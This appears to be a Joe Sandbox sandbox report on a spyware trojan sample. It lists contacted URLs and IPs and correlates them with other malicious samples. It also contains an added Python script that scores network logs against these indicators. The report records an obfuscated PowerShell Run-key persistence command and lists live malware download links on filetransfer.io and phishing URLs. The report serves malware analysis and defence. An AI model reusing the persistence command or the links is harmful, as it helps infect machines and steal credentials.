                                                                                                                          https://drive-daily-2.corp.google.com/chrome.exe, 00000008.00000002.144265875695.000012AC01560000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://www.youtube.com/s/notifications/manifest/cr_install.html7chrome.exe, 00000008.00000002.144258258607.000012AC00510000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.imvu.commsiexec.exe, msiexec.exe, 0000000B.00000003.144170842635.00000000031AD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.144170955946.00000000031AD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.144171198666.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000B.00000003.144171023674.00000000031AD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.144172323389.00000000031AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://contoso.com/Iconpowershell.exe, 00000002.00000002.144023424474.0000000005F29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://issuetracker.google.com/349489248chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144206111077.000012AC00C9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icochrome.exe, 00000008.00000002.144263390938.000012AC00F68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Web Data.17.drfalse
                                                                                                                                    high
                                                                                                                                    https://www.teacherspayteachers.com/Cartchrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.lulus.com/checkout/bagchrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://www.costco.com/CheckoutCartDisplayViewchrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=bcr_components/customize_color_schrome.exe, 00000008.00000002.144259830065.000012AC00820000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://www.ae.com/us/en/cartchrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://www.llbean.com/webapp/wcs/stores/servlet/LLBShoppingCartDisplaychrome.exe, 00000008.00000002.144258258607.000012AC00510000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://www.qvc.com/checkout/cart.htmlchrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://s20.filetransfer.io/Wmsiexec.exe, 00000004.00000003.144118475021.00000000054E8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144377552368.00000000054E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://www.ecosia.org/newtab/chrome.exe, 00000008.00000002.144262848392.000012AC00E64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144208274532.000012AC00E90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://drive-daily-1.corp.google.com/chrome.exe, 00000008.00000002.144265875695.000012AC01560000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://cart.ebay.com/chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.144019020175.0000000005018000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://drive-daily-5.corp.google.com/chrome.exe, 00000008.00000002.144265875695.000012AC01560000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://duckduckgo.com/favicon.icochrome.exe, 00000008.00000002.144262848392.000012AC00E64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144208274532.000012AC00E90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.amazon.com/gp/cart/view.htmlchrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://docs.google.com/spreadsheets/chrome.exe, 00000008.00000002.144263481982.000012AC00F8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144264974668.000012AC01294000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://www.gamestop.com/cart/chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://nsis.sf.net/NSIS_ErrorrPO3799039985.exe, rPO3799039985.exe.2.drfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://www.boostmobile.com/cart.htmlchrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://www.samsclub.com/cartchrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://anglebug.com/4722msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://assets.msn.com/statics/icons/favicon_newtabpage.pngFavicons.17.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://m.google.com/devicemanagement/data/apichrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://www.kohls.com/checkout/shopping_cart.jspchrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://anglebug.com/1452msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://www.overstock.com/cartchrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://www.bloomingdales.com/my-bagchrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://chromewebstore.google.com/chrome.exe, 00000008.00000002.144255441864.000012AC00014000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://www.crateandbarrel.com/Checkout/Cartchrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://www.google.com/accounts/serviceloginmsiexec.exefalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://drive-preprod.corp.google.com/chrome.exe, 00000008.00000002.144265875695.000012AC01560000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://clients4.google.com/chrome-syncchrome.exe, 00000008.00000002.144257037264.000012AC00288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://gemini.google.com/app?q=chrome.exe, 00000008.00000002.144262805081.000012AC00E50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144263390938.000012AC00F68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://secure.newegg.com/shop/cartchrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://s20.filetransfer.io//msiexec.exe, 00000004.00000003.144118475021.00000000054E8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144377552368.00000000054E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                            unknown
                                                                                                                                                                                            http://pesterbdd.com/images/Pester.png4powershell.exe, 00000002.00000002.144019020175.0000000005018000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://gemini.google.com/app?q=searchTermschrome.exe, 00000008.00000002.144262805081.000012AC00E50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://google.com/searchchrome.exe, 00000008.00000003.144169246553.000012A800468000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://www.jcrew.com/checkout/cartchrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://uk.search.yahoo.com/searchchrome.exe, 00000008.00000002.144261885134.000012AC00CC4000.00000004.00000800.00020000.00000000.sdmpfalse
high
https://aefd.nelreports.net/api/report?cat=bingth | Reporting and NEL.20.dr | false | | high
http://anglebug.com/5007 | msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://drive.google.com/drive/installwebapp?usp=chrome_default | chrome.exe, 00000008.00000002.144262325708.000012AC00D8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144263261282.000012AC00F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144245913297.000012AC011A0000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.13.139 | filetransfer.io | United States | 13335 | CLOUDFLARENETUS | false
87.120.114.20 | unknown | Bulgaria | 25206 | UNACS-AS-BG8000BurgasBG | true
172.67.200.96 | s20.filetransfer.io | United States | 13335 | CLOUDFLARENETUS | false
52.123.251.14 | svc.ms-acdc-teams.office.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
172.64.41.3 | chrome.cloudflare-dns.com | United States | 13335 | CLOUDFLARENETUS | false
172.217.215.132 | googlehosted.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false
149.112.112.112 | dns.quad9.net | United States | 19281 | QUAD9-AS-1US | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
3.163.101.92 | sb.scorecardresearch.com | United States | 16509 | AMAZON-02US | false
IP (private)
192.168.11.20
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1553438
Start date and time: 2024-11-11 08:08:17 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 16m 29s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
Run name: Suspected Instruction Hammering
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: rPO3799039985.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@66/149@13/12
EGA Information:
• Successful, ratio: 83.3%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 219
• Number of non-executed functions: 190
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Excluded processes from analysis (whitelisted): dllhost.exe, CompPkgSrv.exe, backgroundTaskHost.exe, svchost.exe, TextInputHost.exe
                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 74.125.21.94, 173.194.219.95, 64.233.176.95, 64.233.185.95, 142.250.105.95, 74.125.21.95, 108.177.122.95, 172.253.124.95, 74.125.136.95, 64.233.177.95, 74.125.138.95, 142.250.9.95, 172.217.215.95, 64.233.185.84, 142.250.9.139, 142.250.9.138, 142.250.9.101, 142.250.9.100, 142.250.9.102, 142.250.9.113, 34.104.35.123, 20.75.60.91, 204.79.197.203, 23.1.33.205, 23.1.33.202, 23.1.33.197, 23.1.33.216, 4.150.155.223, 13.91.96.185, 23.0.175.195, 23.0.175.163, 23.47.218.79, 23.47.218.90, 23.1.33.14, 23.1.33.4, 13.107.21.237, 204.79.197.237, 20.110.205.119, 204.79.197.239, 13.107.21.239, 104.76.210.92, 104.76.210.76, 142.250.105.94, 74.125.136.94, 172.253.124.94
                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): config.edge.skype.com.trafficmanager.net, prod-atm-wds-nav.trafficmanager.net, data-edge.smartscreen.microsoft.com, img-s-msn-com.akamaized.net, c-msn-com-nsatc.trafficmanager.net, clientservices.googleapis.com, nav.smartscreen.microsoft.com, arc.msn.com, iris-de-prod-azsc-v2-eus2-b.eastus2.cloudapp.azure.com, clients2.google.com, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, login.live.com, th.bing.com, arc.trafficmanager.net, a1858.dscd.akamai.net, www.gstatic.com, config.edge.skype.com, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, edge-microsoft-com.dual-a-0036.a-msedge.net, accounts.google.com, th.bing.com.edgekey.net, c-bing-com.dual-a-0034.a-msedge.net, a-0003.a-msedge.net, p-th.bing.com.trafficmanager.net, www-msn-com.a-0003.a-msedge.net, prod-atm-wds-edge.trafficmanager.net, deff.nelreports.net.akamaized.net, www-www.bing.com.trafficmanager.net, edge.microsoft.com, safebrowsingohttpgateway.googleapis.com, prod-agic-cu-3.centra
• Execution Graph export aborted for target powershell.exe, PID 2004 because it is empty
• Not all processes were analysed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big; too many NtProtectVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:11:25 | API Interceptor | 20682563x Sleep call for process: msiexec.exe modified
08:10:50 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Besmears %billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)
08:10:59 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Besmears %billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.13.139 | QUOTATION_MAYQTRA031244#U00faPDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/aFTjGwJu/download
104.21.13.139 | QUOTATION_MAYQTRA031244#U00faPDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/aFTjGwJu/download
104.21.13.139 | QUOTATION_MAYQTRA031244#U00faPDF.scr.exe | malicious | AgentTesla, PureLog Stealer | filetransfer.io/data-package/mAdHjYPt/download
104.21.13.139 | B73X15Rsu7.exe | malicious | Unknown | filetransfer.io/data-package/mU5kQOzV/download
104.21.13.139 | Purchase Order No.P7696#U00faPDF.scr.exe | malicious | AgentTesla, PureLog Stealer | filetransfer.io/data-package/FUq5fnFw/download
104.21.13.139 | QUOTATION_MAYQTRA031244#U00b7PDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/GWyzXjYcdownload
104.21.13.139 | Price List MAYQTRA031244PDF.scr.exe | malicious | AgentTesla, PureLog Stealer | filetransfer.io/data-package/ku7hiEQr/download
104.21.13.139 | QUOTATION_APRQTRA031244#U00faPDF.scr.exe | malicious | AgentTesla, PureLog Stealer | filetransfer.io/data-package/aPtWC5T9/download
104.21.13.139 | QUOTATION_APRQTRA031244#U00b7PDF.scr.exe | malicious | AgentTesla, PureLog Stealer | filetransfer.io/data-package/EN1H0b0j/download
104.21.13.139 | Payment Slip (SWIFT)#U00b7PDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/sooHKfZ9/download
172.67.200.96 | B73X15Rsu7.exe | malicious | Unknown | filetransfer.io/data-package/mU5kQOzV/download
172.67.200.96 | QUOTATION_MAYQTRA031244#U00b7PDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/GWyzXjYcdownload
172.67.200.96 | Purchase Order No.P7696#U00faPDF.scr.exe | malicious | AgentTesla, PureLog Stealer | filetransfer.io/data-package/Ep4Uq1sZ/download
172.67.200.96 | QUOTATION_APRQTRA031244#U00b7PDF.scr.exe | malicious | AgentTesla, PureLog Stealer | filetransfer.io/data-package/ih7ujIri/download
172.67.200.96 | QUOTATION_APRQTRA031244#U00faPDF.scr.exe | malicious | AgentTesla, PureLog Stealer | filetransfer.io/data-package/ncyGKDgF/download
172.67.200.96 | DHL - OVERDUE ACCOUNT NOTICE -1301858139#U00faPDF.scr.exe | malicious | AgentTesla, PureLog Stealer | filetransfer.io/data-package/brvisqCp/download
172.67.200.96 | ORDER_LIST_NOVQTRFA00541#U00b7PDF.scr.exe | malicious | AgentTesla | filetransfer.io/data-package/gim4JWFQ/download
172.67.200.96 | ORDER_LIST_OCTQTRFA00541.exe | malicious | AgentTesla | filetransfer.io/data-package/nRJn2xsI/download
172.67.200.96 | QUOTATION_OCTQTRFA00541#U00b7PDF.scr.exe | malicious | AgentTesla | filetransfer.io/data-package/TvlWlABo/download
172.67.200.96 | Payment_Slip_(SWIFT)#U00b7PDF.scr.exe | malicious | AgentTesla | filetransfer.io/data-package/vZQN1oGp/download
Match | Associated Sample Name / URL | Detection | Threat Name | Context

svc.ms-acdc-teams.office.com
  file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar
    • 52.123.242.159
  SecuriteInfo.com.Trojan.GenericKD.74442994.24259.8937.exe | malicious | Unknown
    • 52.123.243.92
  file.exe | malicious | Stealc, Vidar
    • 52.123.243.94
  Seeking Assistance for Legal Assistance in a Medical Matter.msg | malicious | Unknown
    • 52.123.243.81
  https://1drv.ms/b/c/7bab8803aa446446/EVRHiu8efYZAkD-YFD5xQmIBzT5hMnGkyiNpwrnOj-mH_g | malicious | HTMLPhisher
    • 52.123.224.72
  file.exe | malicious | Unknown
    • 52.123.243.83
  Inspection Notice.msg | malicious | HTMLPhisher
    • 52.123.243.74
  file.exe | malicious | Unknown
    • 52.123.243.199
  Order_ 039924.docx.doc | malicious | Unknown
    • 52.123.243.78
  z42ordemdecomprapdf.exe | malicious | FormBook
    • 52.123.243.200

chrome.cloudflare-dns.com
  file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar
    • 162.159.61.3
  file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar
    • 172.64.41.3
  file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar
    • 172.64.41.3
  A3W2CpXxiO.exe | malicious | Stealc, Vidar
    • 172.64.41.3
  file.exe | malicious | Amadey, Stealc, Vidar
    • 162.159.61.3
  file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar
    • 162.159.61.3
  file.exe | malicious | Amadey, Stealc, Vidar
    • 172.64.41.3
  https://qrco.de/bfYBpc | malicious | HtmlDropper, HTMLPhisher
    • 172.64.41.3
  file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar
    • 162.159.61.3
  file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar
    • 172.64.41.3

geoplugin.net
  qy8i3kM2Ir.exe | malicious | GuLoader, Remcos
    • 178.237.33.50
  ORDER#73672-MAT37367.exe | malicious | Remcos
    • 178.237.33.50
  Image_Product_Inquiry_Request_Villoslada.exe | malicious | Remcos, GuLoader
    • 178.237.33.50
  CEBI_ tlumaczenie dokumentow dostawy do CEBI PL_ 11.08.24.exe | malicious | Remcos, GuLoader
    • 178.237.33.50
  Quotation Request #100028153.exe | malicious | Remcos
    • 178.237.33.50
  asegurar.vbs | malicious | Remcos
    • 178.237.33.50
  rIMGCY46473567583458675867864894698467458.exe | malicious | Remcos, GuLoader
    • 178.237.33.50
  RAINBOW_ tlumaczenie dokumentow dostawy do CEBI PL_ 11.08.24.exe | malicious | GuLoader, Remcos
    • 178.237.33.50
  0jg24sHn9q.exe | malicious | Remcos
    • 178.237.33.50
  pagamento.UniCredit.Bank.pdf.exe | malicious | Remcos
    • 178.237.33.50
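The domain table above is a pivot set with very different value per entry: every geoplugin.net match (178.237.33.50) is a Remcos or GuLoader sample, whereas svc.ms-acdc-teams.office.com and chrome.cloudflare-dns.com also show up with unrelated stealer families and with plain documents, i.e. they are shared infrastructure that discriminates nothing on their own. The following is an added example written for this page, not Joe Sandbox output or tooling: it scores internal hosts from Zeek-style JSON dns/conn records using only the indicators listed in the table. The weights, the threshold and the log records are assumptions constructed for the demo.

```python
"""Weighted IOC pivot scoring over Zeek-style JSON log records.

Added example, not part of the Joe Sandbox report. The indicators are the
domains and IPs from the correlation table above; the weights and the log
records are constructed for this demo (assumptions, not report data).
"""
import json
from collections import defaultdict

# Weight = how discriminating a pivot is, judged from the table: geoplugin.net
# and its IP are matched only by Remcos/GuLoader samples, while the Teams
# endpoint and the Cloudflare DoH resolver are hit by unrelated families and
# by ordinary documents, so they get weight 0 (recorded as context only).
INDICATORS = {
    "geoplugin.net": 3,
    "178.237.33.50": 3,
    "svc.ms-acdc-teams.office.com": 0,
    "chrome.cloudflare-dns.com": 0,
}
# IPs the table lists for the two shared endpoints; weight 0 as well.
SHARED_IPS = {
    "52.123.242.159", "52.123.243.92", "52.123.243.94", "52.123.243.81",
    "52.123.224.72", "52.123.243.83", "52.123.243.74", "52.123.243.199",
    "52.123.243.78", "52.123.243.200", "162.159.61.3", "172.64.41.3",
}

# Constructed Zeek-style JSON records (dns.log "query", conn.log "id.resp_h").
SAMPLE_LOG = """
{"_path":"dns","id.orig_h":"10.0.0.5","query":"geoplugin.net"}
{"_path":"conn","id.orig_h":"10.0.0.5","id.resp_h":"178.237.33.50","id.resp_p":80}
{"_path":"dns","id.orig_h":"10.0.0.5","query":"svc.ms-acdc-teams.office.com"}
{"_path":"dns","id.orig_h":"10.0.0.7","query":"chrome.cloudflare-dns.com"}
{"_path":"conn","id.orig_h":"10.0.0.7","id.resp_h":"172.64.41.3","id.resp_p":443}
{"_path":"conn","id.orig_h":"10.0.0.9","id.resp_h":"198.51.100.20","id.resp_p":443}
""".strip().splitlines()


def match_record(rec):
    """Return (indicator, weight) for one record, or None when nothing matches."""
    query = rec.get("query", "").lower().rstrip(".")
    if query in INDICATORS:
        return query, INDICATORS[query]
    dst = rec.get("id.resp_h", "")
    if dst in INDICATORS:
        return dst, INDICATORS[dst]
    if dst in SHARED_IPS:
        return dst, 0
    return None


def score_hosts(lines):
    """Aggregate matches per internal source host: {host: (score, [hits])}."""
    scores = defaultdict(int)
    hits = defaultdict(list)
    for line in lines:
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        m = match_record(rec)
        if m is None:
            continue
        src = rec.get("id.orig_h", "?")
        scores[src] += m[1]
        hits[src].append(m[0])
    return {h: (scores[h], hits[h]) for h in hits}


def flag_hosts(lines, threshold=3):
    """Hosts whose weighted pivot score reaches the threshold, highest first."""
    ranked = score_hosts(lines)
    ordered = sorted(ranked.items(), key=lambda kv: -kv[1][0])
    return [host for host, (score, _) in ordered if score >= threshold]


if __name__ == "__main__":
    for host, (score, seen) in score_hosts(SAMPLE_LOG).items():
        print(f"{host}: score={score} hits={seen}")
    print("flagged:", flag_hosts(SAMPLE_LOG))
```

Only 10.0.0.5 is flagged: it resolved geoplugin.net and connected to 178.237.33.50, which is the same pivot the table shows for the ten Remcos/GuLoader samples. 10.0.0.7 touched only the shared Teams and Cloudflare endpoints and keeps a score of 0, so alerting on those IPs alone would page on every Teams user; they are still kept in the hit list as context for an analyst.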
Match | Associated Sample Name / URL | Detection | Threat Name | Context

UNACS-AS-BG8000BurgasBG
  file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar
    • 87.120.125.16
  file.exe | malicious | Unknown
    • 87.120.125.16
  file.exe | malicious | Unknown
    • 87.120.125.16
  m-i.p-s.Sakura.elf | malicious | Gafgyt, Mirai
    • 87.120.114.132
  m-6.8-k.Sakura.elf | malicious | Gafgyt, Mirai
    • 87.120.114.132
  m-p.s-l.Sakura.elf | malicious | Gafgyt, Mirai
    • 87.120.114.132
  a-r.m-6.Sakura.elf | malicious | Gafgyt, Mirai
    • 87.120.114.132
  p-p.c-.Sakura.elf | malicious | Gafgyt, Mirai
    • 87.120.114.132
  a-r.m-7.Sakura.elf | malicious | Gafgyt, Mirai
    • 87.120.114.132
  x-3.2-.Sakura.elf | malicious | Gafgyt, Mirai
    • 87.120.114.132

CLOUDFLARENETUS
  https://t.salesmatemail.net/email/v1/track?key=0db79d05-9af0-414c-bfc4-998c239faf2b | malicious | Unknown
    • 104.21.33.214
  file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar
    • 188.114.97.3
  file.exe | malicious | LummaC, Stealc, Vidar
    • 188.114.96.3
  Complete_with_DocuSign_49584.pdf | malicious | HTMLPhisher
    • 188.114.96.3
  fHkdf4WB7zhMcqP.exe | malicious | FormBook
    • 188.114.97.3
  file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar
    • 188.114.97.3
  https://parkonking.us15.list-manage.com/track/click?u=ad047aa5468a45d38c75e108c&id=88101fd354&e=1659a0a55d | malicious | Unknown
    • 172.66.41.8
  https://anzsupportus.web.app/# | malicious | Unknown
    • 104.17.24.14
  https://www.google.com/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rqjkphmdlmFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ftao.bb/RTupG#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29t | malicious | HTMLPhisher
    • 104.18.24.163
  install.ps1 | malicious | Unknown
    • 104.18.21.76
Match | Associated Sample Name / URL (Detection; Threat Name) | Context
Match: 28a2c9bd18a11de089ef85a160da29e4
THE COSTS INCURRED PENDING (1).pdf (Detection: malicious; Threat Name: Unknown)
• 20.190.135.7
• 40.126.29.12
https://t.salesmatemail.net/email/v1/track?key=0db79d05-9af0-414c-bfc4-998c239faf2b (Detection: malicious; Threat Name: Unknown)
• 20.190.135.7
• 40.126.29.12
file.exe (Detection: malicious; Threat Name: LummaC, Amadey, LummaC Stealer, Stealc, Vidar)
• 20.190.135.7
• 40.126.29.12
Complete_with_DocuSign_49584.pdf (Detection: malicious; Threat Name: HTMLPhisher)
• 20.190.135.7
• 40.126.29.12
file.exe (Detection: malicious; Threat Name: LummaC, Amadey, LummaC Stealer, Stealc, Vidar)
• 20.190.135.7
• 40.126.29.12
https://parkonking.us15.list-manage.com/track/click?u=ad047aa5468a45d38c75e108c&id=88101fd354&e=1659a0a55d (Detection: malicious; Threat Name: Unknown)
• 20.190.135.7
• 40.126.29.12
https://daddyztech.com/mah/pub/korea/korea/index.php?email=kdjung3@hdel.co.kr (Detection: malicious; Threat Name: HTMLPhisher)
• 20.190.135.7
• 40.126.29.12
https://anzsupportus.web.app/# (Detection: malicious; Threat Name: Unknown)
• 20.190.135.7
• 40.126.29.12
